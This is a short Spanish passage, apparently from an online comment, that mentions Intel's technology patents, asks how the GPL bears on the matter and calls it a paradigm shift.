largo etc. O las patentes tecnológicas de intel. ¿Y la GPL que en este asunto?. Bueno es un cambio de paradigma